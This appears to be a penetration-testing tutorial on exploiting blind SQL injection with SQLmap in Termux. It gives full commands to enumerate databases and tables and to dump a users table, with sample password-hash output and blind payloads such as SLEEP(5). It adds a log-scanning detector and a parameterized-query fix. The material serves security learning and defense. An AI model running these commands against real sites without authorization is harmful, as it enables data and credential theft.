Exploit Blind SQL Injection with SQLmap in Termux


Blind SQL injection is a stealthy yet dangerous web application vulnerability that attackers use to manipulate SQL queries. Unlike traditional SQL injection, where errors or query results are returned directly in the page, blind SQL injection gives the attacker no data in the response; the vulnerability has to be exploited by observing how the application behaves, such as differences between responses or deliberate timing delays.

In this guide, you will learn how to exploit blind SQL injection vulnerabilities using SQLmap within Termux. SQLmap is a powerful open-source penetration testing tool designed to automate the detection and exploitation of SQL injection flaws. We’ll provide clear examples, including sample outputs for each command, so you can develop the skills to assess web application security and protect against potential threats.


Prerequisites

Before proceeding, ensure you have:

  • An Android device with Termux installed.
  • Basic knowledge of SQL and web application structure.
  • Permission to test any web application you attempt to exploit.

Step 1: Install Termux and Update Packages

Start by installing Termux from the Google Play Store or F-Droid. Once installed, open Termux and update your package list:

pkg update && pkg upgrade

Sample Output:

Hit:1 https://packages.termux.dev/apt/termux-main stable InRelease
Reading package lists... Done
All packages are up to date.

Step 2: Install SQLmap

Next, clone the SQLmap repository using Git to install it on your device:

pkg install git python
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap

Sample Output:

Cloning into 'sqlmap'...
remote: Enumerating objects: 45348, done.
remote: Counting objects: 100% (45348/45348), done.
remote: Compressing objects: 100% (18676/18676), done.
Receiving objects: 100% (45348/45348), 7.69 MiB | 2.51 MiB/s, done.
Resolving deltas: 100% (30789/30789), done.

Step 3: Identify a Vulnerable Target

Before you can exploit blind SQL injection, you need a target web application. You can set up a test environment using vulnerable applications like DVWA (Damn Vulnerable Web Application) or bWAPP.

Always ensure you have permission to test a web application to comply with legal and ethical guidelines.


Step 4: Test the Target with SQLmap

Once you identify a potential target URL, use SQLmap to probe for vulnerabilities:

python sqlmap.py -u "http://target.com/vulnerable-page?id=1" --dbs

Explanation:

  • -u: Specifies the URL of the target.
  • --dbs: Tells SQLmap to enumerate databases if the target is vulnerable.

Sample Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE or HAVING clause
    Payload: id=1 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))
---
[INFO] the back-end DBMS is MySQL
available databases:
[*] information_schema
[*] example_db
[*] mysql
[*] performance_schema

Step 5: Exploit Blind SQL Injection to List Tables

Once you’ve found a vulnerable database, you can further exploit blind SQL injection to list its tables:

python sqlmap.py -u "http://target.com/vulnerable-page?id=1" -D example_db --tables

Explanation:

  • -D example_db: Specifies the database you want to explore.
  • --tables: Tells SQLmap to list the tables in the selected database.

Sample Output:

Database: example_db
[1] users
[2] orders
[3] products

Step 6: Extract Data from a Table

Now, let’s retrieve data from a specific table, such as users. Use the following command:

python sqlmap.py -u "http://target.com/vulnerable-page?id=1" -D example_db -T users --dump

Explanation:

  • -T users: Specifies the table to dump data from.
  • --dump: Instructs SQLmap to extract the data.

Sample Output:

id    username    password
1     admin       5f4dcc3b5aa765d61d8327deb882cf99
2     user1       6dcd4ce23d88e2ee9568ba546c007c63

Step 7: Use Delays to Handle Blind SQL Injection

Blind SQL injection often requires time-based attacks where you introduce delays to measure responses. Here’s how you can execute a delay-based attack:

python sqlmap.py -u "http://target.com/vulnerable-page?id=1" --time-sec=5 --dbs

Explanation:

  • --time-sec=5: Sets the number of seconds SQLmap asks the database to delay its response when testing for time-based blind injection (5 is also the default); the injection point is confirmed when the delayed responses are actually observed.

Sample Output:

Parameter: id (GET)
    Type: time-based blind
    Payload: id=1 AND SLEEP(5)
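From the defender's side, the payloads SQLmap reports in Steps 4 and 7 also leave a recognisable trail in the web server's access log. The following is an added example, not part of the original guide, that scans constructed Apache/nginx "combined"-format log lines for those blind-injection markers in the decoded query string and for the default sqlmap User-Agent; the IP addresses and timestamps are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines. The `id` payloads are the ones the
# tutorial's SQLmap output shows (SLEEP(5) and the RLIKE/CASE WHEN probe).
SAMPLE_LOG = """\
203.0.113.9 - - [10/Mar/2024:12:00:01 +0000] "GET /vulnerable-page?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.8"
203.0.113.9 - - [10/Mar/2024:12:00:02 +0000] "GET /vulnerable-page?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:12:00:03 +0000] "GET /vulnerable-page?id=1%20RLIKE%20(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%201%20ELSE%200%20END)) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:12:00:04 +0000] "GET /vulnerable-page?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# One "combined" log line: client IP, request line, status, size, referer, UA.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Markers of blind probes: a time-delay function, a boolean CASE expression,
# the MySQL RLIKE trick from Step 4, and the generic AND-tautology probe.
PAYLOAD_RE = re.compile(
    r"\bsleep\s*\(|\bbenchmark\s*\(|\bcase\s+when\b|\brlike\b|\band\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)


def find_blind_sqli(log_text):
    """Return (client_ip, request_target, reasons) for every request that
    looks like a blind SQL injection probe. parse_qsl() URL-decodes each
    parameter value, so encoded spaces and parentheses are matched correctly."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reasons = []
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if PAYLOAD_RE.search(value):
                reasons.append(f"payload in {name}")
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap user-agent")
        if reasons:
            hits.append((m["ip"], m["target"], reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in find_blind_sqli(SAMPLE_LOG):
        print(ip, target, ", ".join(reasons))
```

A real deployment would rate-limit or alert on a single source producing many such requests in a short window, which is the signature of an automated tool iterating over an oracle one bit at a time.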

Step 8: Mitigate the Risks

It’s essential to remember that exploiting blind SQL injection for unauthorized purposes is illegal. Always report vulnerabilities to the site owner and encourage them to fix the issue. Blind SQL injection vulnerabilities can be mitigated through:

  • Parameterized queries.
  • Input validation and sanitization.
  • Using web application firewalls (WAFs).
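To show why the first two items on that list close the hole, here is an added example (not code from the original guide) of the Step 4 style `id` lookup in its vulnerable form beside a parameterized and validated form. Python's built-in sqlite3 stands in for the MySQL back end, and the `products` table with its two rows is constructed in memory.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's example_db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The 'before' case: the request parameter is pasted into the SQL text.
    The page only reveals found / not found, which is exactly the one-bit
    oracle that SQLmap's boolean-based blind technique drives."""
    sql = f"SELECT name FROM products WHERE id = {raw_id}"
    return conn.execute(sql).fetchone() is not None


def lookup_parameterized(conn, raw_id):
    """The hardened form: the value is validated as an integer first, then
    travels to the database as a bound parameter, so any SQL syntax inside
    it is data, never part of the statement."""
    if not raw_id.isdigit():
        return False  # reject before it reaches the database
    row = conn.execute("SELECT name FROM products WHERE id = ?",
                       (int(raw_id),)).fetchone()
    return row is not None


def oracle_differs(lookup):
    """True when the classic TRUE/FALSE probes get different answers, i.e.
    the endpoint leaks one bit per request to whoever controls `id`."""
    conn = make_db()
    true_probe = lookup(conn, "1 AND 1=1")
    false_probe = lookup(conn, "1 AND 1=2")
    return true_probe != false_probe


if __name__ == "__main__":
    print("vulnerable leaks a bit:", oracle_differs(lookup_vulnerable))
    print("parameterized leaks a bit:", oracle_differs(lookup_parameterized))
```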

Conclusion

In this guide, we covered how to exploit blind SQL injection vulnerabilities using SQLmap in Termux. Blind SQL injection is challenging but exploitable with the right tools and techniques. By using SQLmap, you can efficiently identify, test, and exploit these vulnerabilities, allowing you to assess and strengthen the security of web applications.

Always remember to use your skills ethically and responsibly to make the web a safer place.
